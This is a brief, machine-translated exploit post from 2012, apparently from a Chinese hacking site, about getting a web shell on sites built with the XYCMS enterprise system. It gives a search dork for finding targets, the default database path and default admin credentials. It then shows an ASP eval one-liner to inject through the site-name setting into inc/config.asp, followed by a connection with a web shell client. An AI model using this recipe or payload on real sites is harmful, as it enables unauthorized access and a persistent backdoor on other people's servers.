XYCMS enterprise built Station system default database, the backend to get WebShell-vulnerability warning-the black bar safety net

2012-06-17T00:00:00
ID MYHACK58:62201234117
Type myhack58
Reporter 佚名
Modified 2012-06-17T00:00:00

Description

Keywords: inurl:showkbxx. asp? id=

With the injection point

Default database:data/xy#! 1 2 3. mdb

The default account and password: admin admin

There are many websites that are anti-injection, this time we can download the database, and then a local build, to replace the original database, for injection to obtain administrator account and password

Background get the shell

There is a site configuration in the site name directly inside the Add: xxx"%><%eval request("stomach")%><%'

On the inside is directly inserted, do not remove the site name is...

Then the chopper is connected http://xxxx.com/inc/config.asp password you know